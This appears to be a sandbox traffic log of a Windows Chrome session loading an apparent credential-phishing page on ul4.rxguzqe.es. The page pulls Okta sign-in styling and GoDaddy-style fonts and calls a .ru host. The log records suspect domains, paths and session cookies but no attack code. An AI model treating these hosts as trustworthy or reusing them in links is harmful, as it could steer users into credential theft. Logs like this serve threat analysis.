Source: global traffic	HTTP traffic detected: GET /3VNrMehQ/ HTTP/1.1Host: ul4.rxguzqe.esConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://towsila.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: towsila.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://ul4.rxguzqe.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ul4.rxguzqe.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ul4.rxguzqe.es/3VNrMehQ/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InZ2aUJTSk53KzVaUlVpQlFtM0E0UHc9PSIsInZhbHVlIjoiTDh1d2s1aXVyeC9vbWJYemo0OUlmK3FjOXhkMlZwczg4c3JWSmR6aElvMW4zNU1QTngzclRWU0JqVCs3M3FBanJCb0FBeDZuRDdWMHoxQUJWemJNNmtuWm1QKzVSd1pvRjhsNC9zZlo0TUpSZ2d5ZmtXV1JOa1dYTkFHeUZnTlMiLCJtYWMiOiI2YzNiMDczZDllNGRlYWJlOGZmNGM5YTU4NGYyNjNhMDkzMTllZTg0MGYxYmQxZTY3ZWNhYzY0M2Q3NDc2MjZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjlrcGZ6ZEM1aVZmd1hWVE43MjZ6YVE9PSIsInZhbHVlIjoicU85VjgzK29JUVpUNzY5aWdMN2wxM3lQU3VPR3VhbkJBK204MUp2b2VzMk5vOHZ2MGtOSGp3WU95SHZyM0xRZWZGdlBlbTBpUVMxQUxnSmtRd3BRRDJqNDRBQklheVg0aXFKSzNYQms3SkRnVEpwM3NueU9QWGt0QzB2OFdoa1kiLCJtYWMiOiJkZDU0MjhkZjMzNWZjMGMyYjk3NjQxZDA4NDA1OTRlNzExYjhjNDg2YzZmNGE0NWQyYzEwMDE5YjY1MzdhM2U0IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /pani$d3rxkugs HTTP/1.1Host: luyubb.uishkfyv.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Origin: https://ul4.rxguzqe.esSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ul4.rxguzqe.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /pani$d3rxkugs HTTP/1.1Host: luyubb.uishkfyv.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /3VNrMehQ/ HTTP/1.1Host: ul4.rxguzqe.esConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://ul4.rxguzqe.es/3VNrMehQ/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImpUV3JxbU1ld3hLdDBPenNkZ1NuNHc9PSIsInZhbHVlIjoiVnRQN0ZaWEFWcW01MmdJRVZ5Zi9KSGNuaHJsSUYrdEQzcGQwTDBOUllsZVljdzk4YWY1UjNJQ2REc0lUdmxJU3BHNThNVitpek5xbERDNzJvSXZZS1N1OGVkdElOOVY3YVNMeGgxdEV5RVNYWE1GNDNqQ2RPQlhRbU1Dd0k5bzgiLCJtYWMiOiJlNWIxZDgxNDVhYjAwZTU0Y2JjN2YwMWIxMWMzZGNhMmEwMjQxN2YyYTE1OThkMzA0ZGU2ZGU5ZjE4YmQ3MTA2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlMyVmY4TTR0Q0ZoMXEwWnNLVHdhOHc9PSIsInZhbHVlIjoiRmd0YlNoNnUrbUsyemhCSWFJSUxSck1mTFBZOEZrdTBzUHI3MjZKODRYN0FEOUtYNnJIK2NVdmRRNnRiUHR1c01qOVE0YUF0ZVhrNjROczdMTmh3U0NUT25PUlNEczVZNXRESzFqbXp2UTZCS2tnc25PdXJ0TkxIWk8wUkJObW0iLCJtYWMiOiJhOGFiYjdjODcyYmNlZDZlNGM2OTQ1NTQxYWFhNWYwMTIwYmZiM2U2MWJhMDdhMTJlM2RiYTFmZmMzM2RiNWRiIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /vbmXnpPNejAKnpdCxIaRLC3o HTTP/1.1Host: ul4.rxguzqe.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImpUV3JxbU1ld3hLdDBPenNkZ1NuNHc9PSIsInZhbHVlIjoiVnRQN0ZaWEFWcW01MmdJRVZ5Zi9KSGNuaHJsSUYrdEQzcGQwTDBOUllsZVljdzk4YWY1UjNJQ2REc0lUdmxJU3BHNThNVitpek5xbERDNzJvSXZZS1N1OGVkdElOOVY3YVNMeGgxdEV5RVNYWE1GNDNqQ2RPQlhRbU1Dd0k5bzgiLCJtYWMiOiJlNWIxZDgxNDVhYjAwZTU0Y2JjN2YwMWIxMWMzZGNhMmEwMjQxN2YyYTE1OThkMzA0ZGU2ZGU5ZjE4YmQ3MTA2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlMyVmY4TTR0Q0ZoMXEwWnNLVHdhOHc9PSIsInZhbHVlIjoiRmd0YlNoNnUrbUsyemhCSWFJSUxSck1mTFBZOEZrdTBzUHI3MjZKODRYN0FEOUtYNnJIK2NVdmRRNnRiUHR1c01qOVE0YUF0ZVhrNjROczdMTmh3U0NUT25PUlNEczVZNXRESzFqbXp2UTZCS2tnc25PdXJ0TkxIWk8wUkJObW0iLCJtYWMiOiJhOGFiYjdjODcyYmNlZDZlNGM2OTQ1NTQxYWFhNWYwMTIwYmZiM2U2MWJhMDdhMTJlM2RiYTFmZmMzM2RiNWRiIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://ul4.rxguzqe.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /lmiV46RyymuDoVxIST5O8qv4f3TEjmuwqjedHSpO1km8f7hqhtq3fw HTTP/1.1Host: ul4.rxguzqe.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImM2MHNlaG4zalhjVzAwSDBHTU1COXc9PSIsInZhbHVlIjoiTGMxbDVDR0YwckxUZGkzRVlqRzZtMXZpWEtOQ2lIOURFaER1TnR1WllWQU43Q1JtY3lzaVZzck1aSWFHSTRrcHF2Z0FxRWtPZWJjeFY1VnlnSFRpM1NkWTByYUFseGtzdThTeFptV0xlTStDSWJaQnQvUGNJSmVMMFB0SllDWXYiLCJtYWMiOiJjODQ2OWEwY2ZlZGE3MzlmYzdlNzFmZmQ4YjJhYzEwYjM3Y2FiNGQ3NmM3MGI2MWExZmM2MDg2MWJmMjU1NmZmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik5tS0UxSU9CWmVWVUFFaUlaZ0JPUVE9PSIsInZhbHVlIjoieGgzcXR1aFFsa2FvK2VUcE9DNkEyMUwvc0FHek1LOGdkc2JCZ1Z0WTZZNmhZRTErMVJaVXFqQVRRQzZ1bFV4K0lzOU9sUkpBTlZmOUprdHF2bEM2cENPUXVrN21Rd0xpakJqU3l4dDlnSHZVQzlzNFQzWm1mcjBvTEpNbzJFTmsiLCJtYWMiOiJmZDM2YjQ2YmEzMzc3NmM0Y2YxODljY2E4NjNlNGQxMTE2MzM5NTYzY2M5NzY0ZWEyNzI5NDI4NDExMzc4YTIyIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /OUAAABZBWRBGBZQAWIGOTYZELhzppkvhdtdz9agbafeg9ajk0s0kc5d?LLYDWPXUGSNULOYGCSHPHMWXHQWDJ HTTP/1.1Host: ul4.rxguzqe.esConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://ul4.rxguzqe.es/3VNrMehQ/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImM2MHNlaG4zalhjVzAwSDBHTU1COXc9PSIsInZhbHVlIjoiTGMxbDVDR0YwckxUZGkzRVlqRzZtMXZpWEtOQ2lIOURFaER1TnR1WllWQU43Q1JtY3lzaVZzck1aSWFHSTRrcHF2Z0FxRWtPZWJjeFY1VnlnSFRpM1NkWTByYUFseGtzdThTeFptV0xlTStDSWJaQnQvUGNJSmVMMFB0SllDWXYiLCJtYWMiOiJjODQ2OWEwY2ZlZGE3MzlmYzdlNzFmZmQ4YjJhYzEwYjM3Y2FiNGQ3NmM3MGI2MWExZmM2MDg2MWJmMjU1NmZmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik5tS0UxSU9CWmVWVUFFaUlaZ0JPUVE9PSIsInZhbHVlIjoieGgzcXR1aFFsa2FvK2VUcE9DNkEyMUwvc0FHek1LOGdkc2JCZ1Z0WTZZNmhZRTErMVJaVXFqQVRRQzZ1bFV4K0lzOU9sUkpBTlZmOUprdHF2bEM2cENPUXVrN21Rd0xpakJqU3l4dDlnSHZVQzlzNFQzWm1mcjBvTEpNbzJFTmsiLCJtYWMiOiJmZDM2YjQ2YmEzMzc3NmM0Y2YxODljY2E4NjNlNGQxMTE2MzM5NTYzY2M5NzY0ZWEyNzI5NDI4NDExMzc4YTIyIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /34NViOjdyxy66K6714 HTTP/1.1Host: ul4.rxguzqe.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://ul4.rxguzqe.es/OUAAABZBWRBGBZQAWIGOTYZELhzppkvhdtdz9agbafeg9ajk0s0kc5d?LLYDWPXUGSNULOYGCSHPHMWXHQWDJAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkthSEdpT3VUV0hZNE5xekhzYThzZnc9PSIsInZhbHVlIjoidDJQbWNqUDZsM290RjBoUXl3V09NQUhrMVNheUJoMnNFemVpVFZqa0h2aUt4MnFqNms0SjdRRlpwTm1QQk9IWnMrbVBabmUyVWlQRmt1anNIVmtRdGZVcndQUTZSeS9Yd1JIdUpzbTkyVkhyWCtraDhRRmd3cjdCZ3YvM1NpSFoiLCJtYWMiOiI5MWM1MzMwMTM0MmJiZDVlY2M5ZTAzMjc3YmU5NzY5MzYzN2NiZGMwMjA1ODJlMmY4YjY0NWQ1MGU5YjYzNGJkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhWV1hVMTc4MHBBbW9Ybk8xUU9Ta3c9PSIsInZhbHVlIjoiRkd1TFhxM0lMSVlua3d0dktxclRzQS9NY3dQN045RDd3QldSRmlDUU0xK3EzWWV2K3NHaEFzVWFpOE9WTG5FUTdQSk1MZ3FCU2U4enpmblUrRG9rZWlqYVZ4V2wvbStnM2J1T081bUhqaXA0WFMyMzR6M0FVVjlhdjMyZmYyRkwiLCJtYWMiOiI4YjdmOTJmNmIyNWUwYzE3MTcxMWQ3YTM3NGE1NTUzYTU4M2FhNDQwMzliOTc0MjY1Y2VjMmYyMzA2MjliMGU1IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Microsoft-CryptoAPI/10.0Host: x1.i.lencr.org
Source: global traffic	HTTP traffic detected: GET /abj3Gk04AArsEsigh28 HTTP/1.1Host: ul4.rxguzqe.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://ul4.rxguzqe.es/OUAAABZBWRBGBZQAWIGOTYZELhzppkvhdtdz9agbafeg9ajk0s0kc5d?LLYDWPXUGSNULOYGCSHPHMWXHQWDJAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkthSEdpT3VUV0hZNE5xekhzYThzZnc9PSIsInZhbHVlIjoidDJQbWNqUDZsM290RjBoUXl3V09NQUhrMVNheUJoMnNFemVpVFZqa0h2aUt4MnFqNms0SjdRRlpwTm1QQk9IWnMrbVBabmUyVWlQRmt1anNIVmtRdGZVcndQUTZSeS9Yd1JIdUpzbTkyVkhyWCtraDhRRmd3cjdCZ3YvM1NpSFoiLCJtYWMiOiI5MWM1MzMwMTM0MmJiZDVlY2M5ZTAzMjc3YmU5NzY5MzYzN2NiZGMwMjA1ODJlMmY4YjY0NWQ1MGU5YjYzNGJkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhWV1hVMTc4MHBBbW9Ybk8xUU9Ta3c9PSIsInZhbHVlIjoiRkd1TFhxM0lMSVlua3d0dktxclRzQS9NY3dQN045RDd3QldSRmlDUU0xK3EzWWV2K3NHaEFzVWFpOE9WTG5FUTdQSk1MZ3FCU2U4enpmblUrRG9rZWlqYVZ4V2wvbStnM2J1T081bUhqaXA0WFMyMzR6M0FVVjlhdjMyZmYyRkwiLCJtYWMiOiI4YjdmOTJmNmIyNWUwYzE3MTcxMWQ3YTM3NGE1NTUzYTU4M2FhNDQwMzliOTc0MjY1Y2VjMmYyMzA2MjliMGU1IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /GDSherpa-bold.woff2 HTTP/1.1Host: ul4.rxguzqe.esConnection: keep-aliveOrigin: https://ul4.rxguzqe.essec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://ul4.rxguzqe.es/OUAAABZBWRBGBZQAWIGOTYZELhzppkvhdtdz9agbafeg9ajk0s0kc5d?LLYDWPXUGSNULOYGCSHPHMWXHQWDJAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkthSEdpT3VUV0hZNE5xekhzYThzZnc9PSIsInZhbHVlIjoidDJQbWNqUDZsM290RjBoUXl3V09NQUhrMVNheUJoMnNFemVpVFZqa0h2aUt4MnFqNms0SjdRRlpwTm1QQk9IWnMrbVBabmUyVWlQRmt1anNIVmtRdGZVcndQUTZSeS9Yd1JIdUpzbTkyVkhyWCtraDhRRmd3cjdCZ3YvM1NpSFoiLCJtYWMiOiI5MWM1MzMwMTM0MmJiZDVlY2M5ZTAzMjc3YmU5NzY5MzYzN2NiZGMwMjA1ODJlMmY4YjY0NWQ1MGU5YjYzNGJkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhWV1hVMTc4MHBBbW9Ybk8xUU9Ta3c9PSIsInZhbHVlIjoiRkd1TFhxM0lMSVlua3d0dktxclRzQS9NY3dQN045RDd3QldSRmlDUU0xK3EzWWV2K3NHaEFzVWFpOE9WTG5FUTdQSk1MZ3FCU2U4enpmblUrRG9rZWlqYVZ4V2wvbStnM2J1T081bUhqaXA0WFMyMzR6M0FVVjlhdjMyZmYyRkwiLCJtYWMiOiI4YjdmOTJmNmIyNWUwYzE3MTcxMWQ3YTM3NGE1NTUzYTU4M2FhNDQwMzliOTc0MjY1Y2VjMmYyMzA2MjliMGU1IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /GDSherpa-bold.woff HTTP/1.1Host: ul4.rxguzqe.esConnection: keep-aliveOrigin: https://ul4.rxguzqe.essec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://ul4.rxguzqe.es/OUAAABZBWRBGBZQAWIGOTYZELhzppkvhdtdz9agbafeg9ajk0s0kc5d?LLYDWPXUGSNULOYGCSHPHMWXHQWDJAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkthSEdpT3VUV0hZNE5xekhzYThzZnc9PSIsInZhbHVlIjoidDJQbWNqUDZsM290RjBoUXl3V09NQUhrMVNheUJoMnNFemVpVFZqa0h2aUt4MnFqNms0SjdRRlpwTm1QQk9IWnMrbVBabmUyVWlQRmt1anNIVmtRdGZVcndQUTZSeS9Yd1JIdUpzbTkyVkhyWCtraDhRRmd3cjdCZ3YvM1NpSFoiLCJtYWMiOiI5MWM1MzMwMTM0MmJiZDVlY2M5ZTAzMjc3YmU5NzY5MzYzN2NiZGMwMjA1ODJlMmY4YjY0NWQ1MGU5YjYzNGJkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhWV1hVMTc4MHBBbW9Ybk8xUU9Ta3c9PSIsInZhbHVlIjoiRkd1TFhxM0lMSVlua3d0dktxclRzQS9NY3dQN045RDd3QldSRmlDUU0xK3EzWWV2K3NHaEFzVWFpOE9WTG5FUTdQSk1MZ3FCU2U4enpmblUrRG9rZWlqYVZ4V2wvbStnM2J1T081bUhqaXA0WFMyMzR6M0FVVjlhdjMyZmYyRkwiLCJtYWMiOiI4YjdmOTJmNmIyNWUwYzE3MTcxMWQ3YTM3NGE1NTUzYTU4M2FhNDQwMzliOTc0MjY1Y2VjMmYyMzA2MjliMGU1IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /GDSherpa-regular.woff2 HTTP/1.1Host: ul4.rxguzqe.esConnection: keep-aliveOrigin: https://ul4.rxguzqe.essec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://ul4.rxguzqe.es/OUAAABZBWRBGBZQAWIGOTYZELhzppkvhdtdz9agbafeg9ajk0s0kc5d?LLYDWPXUGSNULOYGCSHPHMWXHQWDJAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkthSEdpT3VUV0hZNE5xekhzYThzZnc9PSIsInZhbHVlIjoidDJQbWNqUDZsM290RjBoUXl3V09NQUhrMVNheUJoMnNFemVpVFZqa0h2aUt4MnFqNms0SjdRRlpwTm1QQk9IWnMrbVBabmUyVWlQRmt1anNIVmtRdGZVcndQUTZSeS9Yd1JIdUpzbTkyVkhyWCtraDhRRmd3cjdCZ3YvM1NpSFoiLCJtYWMiOiI5MWM1MzMwMTM0MmJiZDVlY2M5ZTAzMjc3YmU5NzY5MzYzN2NiZGMwMjA1ODJlMmY4YjY0NWQ1MGU5YjYzNGJkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhWV1hVMTc4MHBBbW9Ybk8xUU9Ta3c9PSIsInZhbHVlIjoiRkd1TFhxM0lMSVlua3d0dktxclRzQS9NY3dQN045RDd3QldSRmlDUU0xK3EzWWV2K3NHaEFzVWFpOE9WTG5FUTdQSk1MZ3FCU2U4enpmblUrRG9rZWlqYVZ4V2wvbStnM2J1T081bUhqaXA0WFMyMzR6M0FVVjlhdjMyZmYyRkwiLCJtYWMiOiI4YjdmOTJmNmIyNWUwYzE3MTcxMWQ3YTM3NGE1NTUzYTU4M2FhNDQwMzliOTc0MjY1Y2VjMmYyMzA2MjliMGU1IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /GDSherpa-regular.woff HTTP/1.1Host: ul4.rxguzqe.esConnection: keep-aliveOrigin: https://ul4.rxguzqe.essec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://ul4.rxguzqe.es/OUAAABZBWRBGBZQAWIGOTYZELhzppkvhdtdz9agbafeg9ajk0s0kc5d?LLYDWPXUGSNULOYGCSHPHMWXHQWDJAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkthSEdpT3VUV0hZNE5xekhzYThzZnc9PSIsInZhbHVlIjoidDJQbWNqUDZsM290RjBoUXl3V09NQUhrMVNheUJoMnNFemVpVFZqa0h2aUt4MnFqNms0SjdRRlpwTm1QQk9IWnMrbVBabmUyVWlQRmt1anNIVmtRdGZVcndQUTZSeS9Yd1JIdUpzbTkyVkhyWCtraDhRRmd3cjdCZ3YvM1NpSFoiLCJtYWMiOiI5MWM1MzMwMTM0MmJiZDVlY2M5ZTAzMjc3YmU5NzY5MzYzN2NiZGMwMjA1ODJlMmY4YjY0NWQ1MGU5YjYzNGJkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhWV1hVMTc4MHBBbW9Ybk8xUU9Ta3c9PSIsInZhbHVlIjoiRkd1TFhxM0lMSVlua3d0dktxclRzQS9NY3dQN045RDd3QldSRmlDUU0xK3EzWWV2K3NHaEFzVWFpOE9WTG5FUTdQSk1MZ3FCU2U4enpmblUrRG9rZWlqYVZ4V2wvbStnM2J1T081bUhqaXA0WFMyMzR6M0FVVjlhdjMyZmYyRkwiLCJtYWMiOiI4YjdmOTJmNmIyNWUwYzE3MTcxMWQ3YTM3NGE1NTUzYTU4M2FhNDQwMzliOTc0MjY1Y2VjMmYyMzA2MjliMGU1IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://ul4.rxguzqe.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fent/randexp.js/releases/download/v0.4.3/randexp.min.js HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://ul4.rxguzqe.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
